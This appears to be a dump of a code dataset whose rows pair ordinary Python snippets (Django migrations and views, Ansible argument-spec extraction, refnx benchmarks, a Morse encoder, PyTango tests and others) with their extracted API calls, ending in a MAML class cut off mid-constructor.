code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('town', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Shop',
fields=[
('id', models.AutoField(auto_created=True, verbose_name='ID', serialize=False, primary_key=True)),
('name', models.CharField(max_length=255, verbose_name='Shop')),
('size', models.IntegerField()),
('address', models.CharField(blank=True, max_length=255, verbose_name='住所', null=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('modified', models.DateTimeField(default=django.utils.timezone.now)),
('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL, verbose_name='所有者')),
],
options={
},
bases=(models.Model,),
),
]
| [
"django.db.models.IntegerField",
"django.db.models.ForeignKey",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.migrations.swappable_dependency",
"django.db.models.CharField"
] | [((239, 296), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (270, 296), False, 'from django.db import models, migrations\n'), ((459, 552), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'verbose_name': '"""ID"""', 'serialize': '(False)', 'primary_key': '(True)'}), "(auto_created=True, verbose_name='ID', serialize=False,\n primary_key=True)\n", (475, 552), False, 'from django.db import models, migrations\n'), ((576, 629), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'verbose_name': '"""Shop"""'}), "(max_length=255, verbose_name='Shop')\n", (592, 629), False, 'from django.db import models, migrations\n'), ((657, 678), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (676, 678), False, 'from django.db import models, migrations\n'), ((709, 783), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)', 'verbose_name': '"""住所"""', 'null': '(True)'}), "(blank=True, max_length=255, verbose_name='住所', null=True)\n", (725, 783), False, 'from django.db import models, migrations\n'), ((814, 869), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (834, 869), False, 'from django.db import models, migrations\n'), ((901, 956), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (921, 956), False, 'from django.db import models, migrations\n'), ((985, 1051), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': 'settings.AUTH_USER_MODEL', 'verbose_name': '"""所有者"""'}), "(to=settings.AUTH_USER_MODEL, verbose_name='所有者')\n", (1002, 1051), False, 'from django.db import models, migrations\n')] |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 <NAME> <<EMAIL>>
# Copyright (C) 2016 Rackspace US, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import runpy
import json
import os
import subprocess
import sys
from contextlib import contextmanager
from ansible.executor.powershell.module_manifest import PSModuleDepFinder
from ansible.module_utils.basic import FILE_COMMON_ARGUMENTS
from ansible.module_utils.six import reraise
from ansible.module_utils._text import to_bytes, to_text
from .utils import CaptureStd, find_executable, get_module_name_from_filename
class AnsibleModuleCallError(RuntimeError):
pass
class AnsibleModuleImportError(ImportError):
pass
class AnsibleModuleNotInitialized(Exception):
pass
class _FakeAnsibleModuleInit:
def __init__(self):
self.args = tuple()
self.kwargs = {}
self.called = False
def __call__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.called = True
raise AnsibleModuleCallError('AnsibleModuleCallError')
def _fake_load_params():
pass
@contextmanager
def setup_env(filename):
# Used to clean up imports later
pre_sys_modules = list(sys.modules.keys())
fake = _FakeAnsibleModuleInit()
module = __import__('ansible.module_utils.basic').module_utils.basic
_original_init = module.AnsibleModule.__init__
_original_load_params = module._load_params
setattr(module.AnsibleModule, '__init__', fake)
setattr(module, '_load_params', _fake_load_params)
try:
yield fake
finally:
setattr(module.AnsibleModule, '__init__', _original_init)
setattr(module, '_load_params', _original_load_params)
# Clean up imports to prevent issues with mutable data being used in modules
for k in list(sys.modules.keys()):
# It's faster if we limit to items in ansible.module_utils
# But if this causes problems later, we should remove it
if k not in pre_sys_modules and k.startswith('ansible.module_utils.'):
del sys.modules[k]
def get_ps_argument_spec(filename, collection):
fqc_name = get_module_name_from_filename(filename, collection)
pwsh = find_executable('pwsh')
if not pwsh:
raise FileNotFoundError('Required program for PowerShell arg spec inspection "pwsh" not found.')
module_path = os.path.join(os.getcwd(), filename)
b_module_path = to_bytes(module_path, errors='surrogate_or_strict')
with open(b_module_path, mode='rb') as module_fd:
b_module_data = module_fd.read()
ps_dep_finder = PSModuleDepFinder()
ps_dep_finder.scan_module(b_module_data, fqn=fqc_name)
# For ps_argspec.ps1 to compile Ansible.Basic it also needs the AddType module_util.
ps_dep_finder._add_module((b"Ansible.ModuleUtils.AddType", ".psm1", None), wrapper=False)
util_manifest = json.dumps({
'module_path': to_text(module_path, errors='surrogiate_or_strict'),
'ansible_basic': ps_dep_finder.cs_utils_module["Ansible.Basic"]['path'],
'ps_utils': dict([(name, info['path']) for name, info in ps_dep_finder.ps_modules.items()]),
})
script_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'ps_argspec.ps1')
proc = subprocess.Popen([script_path, util_manifest], stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=False)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
raise AnsibleModuleImportError("STDOUT:\n%s\nSTDERR:\n%s" % (stdout.decode('utf-8'), stderr.decode('utf-8')))
kwargs = json.loads(stdout)
# the validate-modules code expects the options spec to be under the argument_spec key not options as set in PS
kwargs['argument_spec'] = kwargs.pop('options', {})
return kwargs['argument_spec'], (), kwargs
def get_py_argument_spec(filename, collection):
name = get_module_name_from_filename(filename, collection)
with setup_env(filename) as fake:
try:
with CaptureStd():
runpy.run_module(name, run_name='__main__', alter_sys=True)
except AnsibleModuleCallError:
pass
except BaseException as e:
# we want to catch all exceptions here, including sys.exit
reraise(AnsibleModuleImportError, AnsibleModuleImportError('%s' % e), sys.exc_info()[2])
if not fake.called:
raise AnsibleModuleNotInitialized()
try:
# for ping kwargs == {'argument_spec':{'data':{'type':'str','default':'pong'}}, 'supports_check_mode':True}
if 'argument_spec' in fake.kwargs:
argument_spec = fake.kwargs['argument_spec']
else:
argument_spec = fake.args[0]
# If add_file_common_args is truish, add options from FILE_COMMON_ARGUMENTS when not present.
# This is the only modification to argument_spec done by AnsibleModule itself, and which is
# not caught by setup_env's AnsibleModule replacement
if fake.kwargs.get('add_file_common_args'):
for k, v in FILE_COMMON_ARGUMENTS.items():
if k not in argument_spec:
argument_spec[k] = v
return argument_spec, fake.args, fake.kwargs
except (TypeError, IndexError):
return {}, (), {}
def get_argument_spec(filename, collection):
if filename.endswith('.py'):
return get_py_argument_spec(filename, collection)
else:
return get_ps_argument_spec(filename, collection)
| [
"json.loads",
"subprocess.Popen",
"sys.modules.keys",
"os.getcwd",
"os.path.realpath",
"runpy.run_module",
"ansible.module_utils.basic.FILE_COMMON_ARGUMENTS.items",
"ansible.module_utils._text.to_bytes",
"sys.exc_info",
"ansible.executor.powershell.module_manifest.PSModuleDepFinder",
"ansible.mo... | [((3157, 3208), 'ansible.module_utils._text.to_bytes', 'to_bytes', (['module_path'], {'errors': '"""surrogate_or_strict"""'}), "(module_path, errors='surrogate_or_strict')\n", (3165, 3208), False, 'from ansible.module_utils._text import to_bytes, to_text\n'), ((3325, 3344), 'ansible.executor.powershell.module_manifest.PSModuleDepFinder', 'PSModuleDepFinder', ([], {}), '()\n', (3342, 3344), False, 'from ansible.executor.powershell.module_manifest import PSModuleDepFinder\n'), ((3993, 4104), 'subprocess.Popen', 'subprocess.Popen', (['[script_path, util_manifest]'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': '(False)'}), '([script_path, util_manifest], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, shell=False)\n', (4009, 4104), False, 'import subprocess\n'), ((4331, 4349), 'json.loads', 'json.loads', (['stdout'], {}), '(stdout)\n', (4341, 4349), False, 'import json\n'), ((1913, 1931), 'sys.modules.keys', 'sys.modules.keys', ([], {}), '()\n', (1929, 1931), False, 'import sys\n'), ((3114, 3125), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3123, 3125), False, 'import os\n'), ((2528, 2546), 'sys.modules.keys', 'sys.modules.keys', ([], {}), '()\n', (2544, 2546), False, 'import sys\n'), ((3645, 3696), 'ansible.module_utils._text.to_text', 'to_text', (['module_path'], {'errors': '"""surrogiate_or_strict"""'}), "(module_path, errors='surrogiate_or_strict')\n", (3652, 3696), False, 'from ansible.module_utils._text import to_bytes, to_text\n'), ((3935, 3961), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (3951, 3961), False, 'import os\n'), ((5804, 5833), 'ansible.module_utils.basic.FILE_COMMON_ARGUMENTS.items', 'FILE_COMMON_ARGUMENTS.items', ([], {}), '()\n', (5831, 5833), False, 'from ansible.module_utils.basic import FILE_COMMON_ARGUMENTS\n'), ((4783, 4842), 'runpy.run_module', 'runpy.run_module', (['name'], {'run_name': '"""__main__"""', 'alter_sys': '(True)'}), "(name, run_name='__main__', alter_sys=True)\n", (4799, 4842), False, 'import runpy\n'), ((5087, 5101), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5099, 5101), False, 'import sys\n')] |
"""
print scripts
"""
from termcolor import colored
from pygitscrum.args import compute_args
import colorama
def print_resume_list(list_to_print, message):
"""
print list summary
"""
if len(list_to_print) > 0:
print("")
print(
my_colored(
message + " : ",
"green",
)
)
print(
my_colored(
"\n".join(map(str, list_to_print)),
"yellow",
)
)
print(
my_colored(
"total : " + str(len(list_to_print)),
"green",
)
)
def print_resume_map(dict_to_print, message):
"""
print dict summary
"""
if len(dict_to_print) > 0:
print("")
print(my_colored(message + " : ", "green"))
for key in dict_to_print:
print(
my_colored(
key
+ " --> "
+ str(dict_to_print[key])
+ " elements",
"yellow",
)
)
print(
my_colored(
"total : "
+ str(len(dict_to_print))
+ " --> "
+ str(sum(dict_to_print.values()))
+ " elements ",
"green",
)
)
def print_debug(message):
"""
print debug message
"""
if compute_args().debug:
print("debug : " + message)
def print_y(message):
"""
print yellow message
"""
print(my_colored(message, "yellow"))
def print_g(message):
"""
print green message
"""
print(my_colored(message, "green"))
def print_r(message):
"""
print red message
"""
print(my_colored(message, "red"))
def my_colored(message,color):
if compute_args().nocolor:
return message
return colored(message, color)
| [
"pygitscrum.args.compute_args",
"termcolor.colored"
] | [((1923, 1946), 'termcolor.colored', 'colored', (['message', 'color'], {}), '(message, color)\n', (1930, 1946), False, 'from termcolor import colored\n'), ((1458, 1472), 'pygitscrum.args.compute_args', 'compute_args', ([], {}), '()\n', (1470, 1472), False, 'from pygitscrum.args import compute_args\n'), ((1865, 1879), 'pygitscrum.args.compute_args', 'compute_args', ([], {}), '()\n', (1877, 1879), False, 'from pygitscrum.args import compute_args\n')] |
import torch
from estimation import compute_m
i = [[0, 1, 1, 2],
[2, 0, 2, 1]]
v_z = [3, 4, 5, 2]
v_c = [0, 1, 1, 0]
z = torch.sparse_coo_tensor(i, v_z, (3, 3))
c = torch.sparse_coo_tensor(i, v_c, (3, 3))
max_K = 10
m = compute_m(z, c, max_K)
print(m) | [
"torch.sparse_coo_tensor",
"estimation.compute_m"
] | [((128, 167), 'torch.sparse_coo_tensor', 'torch.sparse_coo_tensor', (['i', 'v_z', '(3, 3)'], {}), '(i, v_z, (3, 3))\n', (151, 167), False, 'import torch\n'), ((172, 211), 'torch.sparse_coo_tensor', 'torch.sparse_coo_tensor', (['i', 'v_c', '(3, 3)'], {}), '(i, v_c, (3, 3))\n', (195, 211), False, 'import torch\n'), ((229, 251), 'estimation.compute_m', 'compute_m', (['z', 'c', 'max_K'], {}), '(z, c, max_K)\n', (238, 251), False, 'from estimation import compute_m\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of the SMSGateway project
#
#
#
# Distributed under the terms of the MIT license.
# See LICENSE.txt for more info.
"""Contain the tests for the SMSGateway for PANIC."""
# Path
import sys
import os
path = os.path.join(os.path.dirname(__file__), os.pardir)
sys.path.insert(0, os.path.abspath(path))
# Imports
from time import sleep
from mock import MagicMock
from PyTango import DevFailed, DevState
from devicetest import DeviceTestCase, main
from SMSGateway import SMSGateway
# Note:
#
# Since the device uses an inner thread, it is necessary to
# wait during the tests in order the let the device update itself.
# Hence, the sleep calls have to be secured enough not to produce
# any inconsistent behavior. However, the unittests need to run fast.
# Here, we use a factor 3 between the read period and the sleep calls.
#
# Look at devicetest examples for more advanced testing
# Device test case
class SMSGatewayDeviceTestCase(DeviceTestCase):
"""Test case for packet generation."""
# PROTECTED REGION ID(SMSGateway.test_additionnal_import) ENABLED START #
# PROTECTED REGION END # // SMSGateway.test_additionnal_import
device = SMSGateway
properties = {'IP': '', 'PIN': '9044',
}
empty = None # Should be []
@classmethod
def mocking(cls):
"""Mock external libraries."""
# Example : Mock numpy
# cls.numpy = SMSGateway.numpy = MagicMock()
# PROTECTED REGION ID(SMSGateway.test_mocking) ENABLED START #
# PROTECTED REGION END # // SMSGateway.test_mocking
def test_properties(self):
# test the properties
# PROTECTED REGION ID(SMSGateway.test_properties) ENABLED START #
# PROTECTED REGION END # // SMSGateway.test_properties
pass
def test_State(self):
"""Test for State"""
# PROTECTED REGION ID(SMSGateway.test_State) ENABLED START #
self.device.State()
# PROTECTED REGION END # // SMSGateway.test_State
def test_Status(self):
"""Test for Status"""
# PROTECTED REGION ID(SMSGateway.test_Status) ENABLED START #
self.device.Status()
# PROTECTED REGION END # // SMSGateway.test_Status
def test_Reset(self):
"""Test for Reset"""
# PROTECTED REGION ID(SMSGateway.test_Reset) ENABLED START #
self.device.Reset()
# PROTECTED REGION END # // SMSGateway.test_Reset
def test_Connect(self):
"""Test for Connect"""
# PROTECTED REGION ID(SMSGateway.test_Connect) ENABLED START #
self.device.Connect()
# PROTECTED REGION END # // SMSGateway.test_Connect
def test_SendSMS(self):
"""Test for SendSMS"""
# PROTECTED REGION ID(SMSGateway.test_SendSMS) ENABLED START #
self.device.SendSMS()
# PROTECTED REGION END # // SMSGateway.test_SendSMS
def test_SetPin(self):
"""Test for SetPin"""
# PROTECTED REGION ID(SMSGateway.test_SetPin) ENABLED START #
self.device.SetPin()
# PROTECTED REGION END # // SMSGateway.test_SetPin
def test_TextMessage(self):
"""Test for TextMessage"""
# PROTECTED REGION ID(SMSGateway.test_TextMessage) ENABLED START #
self.device.TextMessage
# PROTECTED REGION END # // SMSGateway.test_TextMessage
def test_Phone(self):
"""Test for Phone"""
# PROTECTED REGION ID(SMSGateway.test_Phone) ENABLED START #
self.device.Phone
# PROTECTED REGION END # // SMSGateway.test_Phone
# Main execution
if __name__ == "__main__":
main()
| [
"os.path.abspath",
"os.path.dirname",
"devicetest.main"
] | [((286, 311), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (301, 311), False, 'import os\n'), ((343, 364), 'os.path.abspath', 'os.path.abspath', (['path'], {}), '(path)\n', (358, 364), False, 'import os\n'), ((3670, 3676), 'devicetest.main', 'main', ([], {}), '()\n', (3674, 3676), False, 'from devicetest import DeviceTestCase, main\n')] |
#!/home/allen/Documents/TamarawTechProjects/interedregistration/intered/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"django.core.management.execute_from_command_line"
] | [((151, 189), 'django.core.management.execute_from_command_line', 'management.execute_from_command_line', ([], {}), '()\n', (187, 189), False, 'from django.core import management\n')] |
import os.path
import numpy as np
import pickle
from .common import Benchmark
from refnx.analysis import CurveFitter, Objective, Parameter
import refnx.reflect
from refnx.reflect._creflect import abeles as c_abeles
from refnx.reflect._reflect import abeles
from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity
from refnx.dataset import ReflectDataset as RD
class Abeles(Benchmark):
def setup(self):
self.q = np.linspace(0.005, 0.5, 50000)
self.layers = np.array([[0, 2.07, 0, 3],
[50, 3.47, 0.0001, 4],
[200, -0.5, 1e-5, 5],
[50, 1, 0, 3],
[0, 6.36, 0, 3]])
self.repeat = 20
self.number = 10
def time_cabeles(self):
c_abeles(self.q, self.layers)
def time_abeles(self):
abeles(self.q, self.layers)
def time_reflectivity_constant_dq_q(self):
reflectivity(self.q, self.layers)
def time_reflectivity_pointwise_dq(self):
reflectivity(self.q, self.layers, dq=0.05 * self.q)
class Reflect(Benchmark):
timeout = 120.
# repeat = 2
def setup(self):
pth = os.path.dirname(os.path.abspath(refnx.reflect.__file__))
e361 = RD(os.path.join(pth, 'test', 'e361r.txt'))
sio2 = SLD(3.47, name='SiO2')
si = SLD(2.07, name='Si')
d2o = SLD(6.36, name='D2O')
polymer = SLD(1, name='polymer')
# e361 is an older dataset, but well characterised
structure361 = si | sio2(10, 4) | polymer(200, 3) | d2o(0, 3)
model361 = ReflectModel(structure361, bkg=2e-5)
model361.scale.vary = True
model361.bkg.vary = True
model361.scale.range(0.1, 2)
model361.bkg.range(0, 5e-5)
model361.dq = 5.
# d2o
structure361[-1].sld.real.vary = True
structure361[-1].sld.real.range(6, 6.36)
self.p = structure361[1].thick
structure361[1].thick.vary = True
structure361[1].thick.range(5, 20)
structure361[2].thick.vary = True
structure361[2].thick.range(100, 220)
structure361[2].sld.real.vary = True
structure361[2].sld.real.range(0.2, 1.5)
self.structure361 = structure361
self.model361 = model361
# e361.x_err = None
self.objective = Objective(self.model361,
e361)
self.fitter = CurveFitter(self.objective, nwalkers=200)
self.fitter.initialise('jitter')
def time_reflect_emcee(self):
# test how fast the emcee sampler runs in serial mode
self.fitter.sampler.run_mcmc(self.fitter._state, 30)
def time_reflect_sampling_parallel(self):
# discrepancies in different runs may be because of different numbers
# of processors
self.model361.threads = 1
self.fitter.sample(30, pool=-1)
def time_pickle_objective(self):
# time taken to pickle an objective
s = pickle.dumps(self.objective)
pickle.loads(s)
def time_pickle_model(self):
# time taken to pickle a model
s = pickle.dumps(self.model361)
pickle.loads(s)
def time_pickle_model(self):
# time taken to pickle a parameter
s = pickle.dumps(self.p)
pickle.loads(s)
def time_structure_slabs(self):
self.structure361.slabs()
| [
"refnx.reflect.ReflectModel",
"refnx.reflect._reflect.abeles",
"refnx.reflect.SLD",
"pickle.dumps",
"refnx.analysis.Objective",
"numpy.array",
"refnx.reflect.reflectivity",
"numpy.linspace",
"pickle.loads",
"refnx.analysis.CurveFitter",
"refnx.reflect._creflect.abeles"
] | [((446, 476), 'numpy.linspace', 'np.linspace', (['(0.005)', '(0.5)', '(50000)'], {}), '(0.005, 0.5, 50000)\n', (457, 476), True, 'import numpy as np\n'), ((499, 609), 'numpy.array', 'np.array', (['[[0, 2.07, 0, 3], [50, 3.47, 0.0001, 4], [200, -0.5, 1e-05, 5], [50, 1, 0, \n 3], [0, 6.36, 0, 3]]'], {}), '([[0, 2.07, 0, 3], [50, 3.47, 0.0001, 4], [200, -0.5, 1e-05, 5], [\n 50, 1, 0, 3], [0, 6.36, 0, 3]])\n', (507, 609), True, 'import numpy as np\n'), ((819, 848), 'refnx.reflect._creflect.abeles', 'c_abeles', (['self.q', 'self.layers'], {}), '(self.q, self.layers)\n', (827, 848), True, 'from refnx.reflect._creflect import abeles as c_abeles\n'), ((885, 912), 'refnx.reflect._reflect.abeles', 'abeles', (['self.q', 'self.layers'], {}), '(self.q, self.layers)\n', (891, 912), False, 'from refnx.reflect._reflect import abeles\n'), ((969, 1002), 'refnx.reflect.reflectivity', 'reflectivity', (['self.q', 'self.layers'], {}), '(self.q, self.layers)\n', (981, 1002), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1058, 1109), 'refnx.reflect.reflectivity', 'reflectivity', (['self.q', 'self.layers'], {'dq': '(0.05 * self.q)'}), '(self.q, self.layers, dq=0.05 * self.q)\n', (1070, 1109), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1341, 1363), 'refnx.reflect.SLD', 'SLD', (['(3.47)'], {'name': '"""SiO2"""'}), "(3.47, name='SiO2')\n", (1344, 1363), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1377, 1397), 'refnx.reflect.SLD', 'SLD', (['(2.07)'], {'name': '"""Si"""'}), "(2.07, name='Si')\n", (1380, 1397), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1412, 1433), 'refnx.reflect.SLD', 'SLD', (['(6.36)'], {'name': '"""D2O"""'}), "(6.36, name='D2O')\n", (1415, 1433), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1452, 1474), 'refnx.reflect.SLD', 'SLD', (['(1)'], {'name': '"""polymer"""'}), "(1, name='polymer')\n", (1455, 1474), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1624, 1661), 'refnx.reflect.ReflectModel', 'ReflectModel', (['structure361'], {'bkg': '(2e-05)'}), '(structure361, bkg=2e-05)\n', (1636, 1661), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((2375, 2405), 'refnx.analysis.Objective', 'Objective', (['self.model361', 'e361'], {}), '(self.model361, e361)\n', (2384, 2405), False, 'from refnx.analysis import CurveFitter, Objective, Parameter\n'), ((2463, 2504), 'refnx.analysis.CurveFitter', 'CurveFitter', (['self.objective'], {'nwalkers': '(200)'}), '(self.objective, nwalkers=200)\n', (2474, 2504), False, 'from refnx.analysis import CurveFitter, Objective, Parameter\n'), ((3021, 3049), 'pickle.dumps', 'pickle.dumps', (['self.objective'], {}), '(self.objective)\n', (3033, 3049), False, 'import pickle\n'), ((3058, 3073), 'pickle.loads', 'pickle.loads', (['s'], {}), '(s)\n', (3070, 3073), False, 'import pickle\n'), ((3159, 3186), 'pickle.dumps', 'pickle.dumps', (['self.model361'], {}), '(self.model361)\n', (3171, 3186), False, 'import pickle\n'), ((3195, 3210), 'pickle.loads', 'pickle.loads', (['s'], {}), '(s)\n', (3207, 3210), False, 'import pickle\n'), ((3300, 3320), 'pickle.dumps', 'pickle.dumps', (['self.p'], {}), '(self.p)\n', (3312, 3320), False, 'import pickle\n'), ((3329, 3344), 'pickle.loads', 'pickle.loads', (['s'], {}), '(s)\n', (3341, 3344), False, 'import pickle\n')] |
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from django.template import loader
from .models import Question
from django.http import Http404
def index(request):
#last_questions_list = Question.objects.order_by('-pub_date')[:5]
#template = loader.get_template("polls/index.html")
#context = {
# 'last_question_list' : last_questions_list,
#}
#output = ', '.join([q.question_text for q in last_questions_list])
#return HttpResponse(template.render(context, request))
last_questions_list = Question.objects.order_by("-pub_date")[:5]
context = {"last_questions_list" : last_questions_list}
return render(request, 'polls/index.html', context)
def edit(request):
return HttpResponse("Hola mundo, esta es el edit de Polls.")
def delete(request):
return HttpResponse("Hola mundo, esta es el delete de Polls.")
#def detail(request, question_id):
# return HttpResponse("Estas viendo el detalle de %s." % question_id)
#def detail(request, question_id):
# try:
# question = Question.objects.get(pk = question_id)
# except Question.DoesNotExist:
# raise Http404("La pagina no existe")
# return render(request, 'polls/detail.html', {"question" : question})
def detail(request, question_id):
question = get_object_or_404(Question, pk = question_id)
return render(request, 'polls/detail.html', {'question' : question})
def results(request, question_id):
response = "Estas buscando los resultados de %s."
return HttpResponse(response % question_id)
def vote(request, question_id):
return HttpResponse("Tu has votado por %s" % question_id)
| [
"django.shortcuts.render",
"django.http.HttpResponse",
"django.shortcuts.get_object_or_404"
] | [((684, 728), 'django.shortcuts.render', 'render', (['request', '"""polls/index.html"""', 'context'], {}), "(request, 'polls/index.html', context)\n", (690, 728), False, 'from django.shortcuts import render, get_object_or_404\n'), ((761, 814), 'django.http.HttpResponse', 'HttpResponse', (['"""Hola mundo, esta es el edit de Polls."""'], {}), "('Hola mundo, esta es el edit de Polls.')\n", (773, 814), False, 'from django.http import HttpResponse\n'), ((848, 903), 'django.http.HttpResponse', 'HttpResponse', (['"""Hola mundo, esta es el delete de Polls."""'], {}), "('Hola mundo, esta es el delete de Polls.')\n", (860, 903), False, 'from django.http import HttpResponse\n'), ((1325, 1368), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Question'], {'pk': 'question_id'}), '(Question, pk=question_id)\n', (1342, 1368), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1382, 1442), 'django.shortcuts.render', 'render', (['request', '"""polls/detail.html"""', "{'question': question}"], {}), "(request, 'polls/detail.html', {'question': question})\n", (1388, 1442), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1546, 1582), 'django.http.HttpResponse', 'HttpResponse', (['(response % question_id)'], {}), '(response % question_id)\n', (1558, 1582), False, 'from django.http import HttpResponse\n'), ((1627, 1677), 'django.http.HttpResponse', 'HttpResponse', (["('Tu has votado por %s' % question_id)"], {}), "('Tu has votado por %s' % question_id)\n", (1639, 1677), False, 'from django.http import HttpResponse\n')] |
import os
from abc import ABC, abstractmethod
class File(ABC):
"""
Abstract class representing text files.
"""
@abstractmethod
def __init__(self):
pass
@staticmethod
def write_file(filename, text, overwrite_existing=True):
"""
Writes output text to a file.
Args:
filename (str): path to file, including name (e.g. ``path/to/input.gjf``)
text (str): desired contents of file
overwrite_existing (Bool): whether any existing files should be overwritten or not
Returns:
``True`` if write succeeded, ``False`` otherwise
"""
if not isinstance(text, str):
raise TypeError("cannot write non-string to file!")
if not overwrite_existing and os.path.exists(filename):
raise ValueError(f"{filename} already exists but not allowed to overwrite")
else:
try:
with open(filename, "w+") as output_file:
output_file.write(text)
return True
except OSError as e:
print(e)
return False
@staticmethod
def append_to_file(filename, text):
"""
Appends output text to a file.
Args:
filename (str): path to file, including name (e.g. ``path/to/input.gjf``)
text (str): desired contents of file
Returns:
``True`` if write succeeded, ``False`` otherwise
"""
if not isinstance(text, str):
raise TypeError("cannot write non-string to file!")
if os.path.exists(filename):
try:
with open(filename, "a+") as output_file:
output_file.write(text)
return True
except OSError as e:
print(e)
return False
else:
raise ValueError(f"{filename} does not exist")
@staticmethod
def read_file(filename, lazy=False):
"""
Reads a file and parses into lines.
Args:
filename (str): The path to the file.
Returns:
A list containing all the lines in the file.
"""
with open(filename, "r") as filehandle:
lines = filehandle.read().splitlines()
return lines
| [
"os.path.exists"
] | [((1617, 1641), 'os.path.exists', 'os.path.exists', (['filename'], {}), '(filename)\n', (1631, 1641), False, 'import os\n'), ((790, 814), 'os.path.exists', 'os.path.exists', (['filename'], {}), '(filename)\n', (804, 814), False, 'import os\n')] |
# Author: <NAME>
import sys as sys
# Morse code dictionary
char_to_dots = {
'A': '.-', 'B': '-...', 'C': '-.-.', 'D': '-..', 'E': '.', 'F': '..-.',
'G': '--.', 'H': '....', 'I': '..', 'J': '.---', 'K': '-.-', 'L': '.-..',
'M': '--', 'N': '-.', 'O': '---', 'P': '.--.', 'Q': '--.-', 'R': '.-.',
'S': '...', 'T': '-', 'U': '..-', 'V': '...-', 'W': '.--', 'X': '-..-',
'Y': '-.--', 'Z': '--..', ' ': ' ', '0': '-----',
'1': '.----', '2': '..---', '3': '...--', '4': '....-', '5': '.....',
'6': '-....', '7': '--...', '8': '---..', '9': '----.',
'&': '.-...', "'": '.----.', '@': '.--.-.', ')': '-.--.-', '(': '-.--.',
':': '---...', ',': '--..--', '=': '-...-', '!': '-.-.--', '.': '.-.-.-',
'-': '-....-', '+': '.-.-.', '"': '.-..-.', '?': '..--..', '/': '-..-.'
}
def encode_morse(message):
message = str(message)
message = message.upper()
try:
for x in message:
print(char_to_dots[x], end=" ")
print("\nMessage was encoded successfully")
# Exceptions
except KeyError:
print("\n" + x + " is an invalid character")
except:
print("\nThere was an error")
if __name__ == "__main__":
print("This program will encode a string into Morse. Unicode characters are not supported.")
string = input("Enter the message to be encoded: ")
encode_morse(string)
sys.exit()
| [
"sys.exit"
] | [((1355, 1365), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1363, 1365), True, 'import sys as sys\n')] |
import tensorflow as tf
import numpy as np
from self_implement_learning_to_adapt.model import construct_fc_weights,construct_inputs,construct_loss,forward_fc
from self_implement_learning_to_adapt.batch_sampler import ParrallelSampler
from self_implement_learning_to_adapt.vectorized_sampler import VectorizedSampler
from rllab.misc import ext
import matplotlib.pyplot as plt
import scipy.signal as signal
from rllab.sampler.stateful_pool import singleton_pool
class MAML(object):
def __init__(self,
step_size,
env,
batch_size,
meta_batch_size,
seed,
n_itr,
max_path_length,
num_grad_updates,
baseline,
policy,
num_samples = 1000,
scope = None,
sess = None,
center_adv=True,
positive_adv=False,
store_paths=False,
whole_paths=True,
fixed_horizon=False,
load_policy = False,
fake_env = None,
save_video = False,
fast_lr = 0.1,
lr = 0.001,
discount = 0.99,
gae_lambda = 1,
):
self.step_size = step_size
self.env = env
self.fake_env = fake_env
self.batch_size = batch_size
self.meta_batch_size = meta_batch_size
self.seed = seed
self.n_itr = n_itr
self.max_path_length = max_path_length
self.num_grad_updates = num_grad_updates
self.discount = discount
self.baseline = baseline
self.gae_lambda = gae_lambda
self.policy = policy
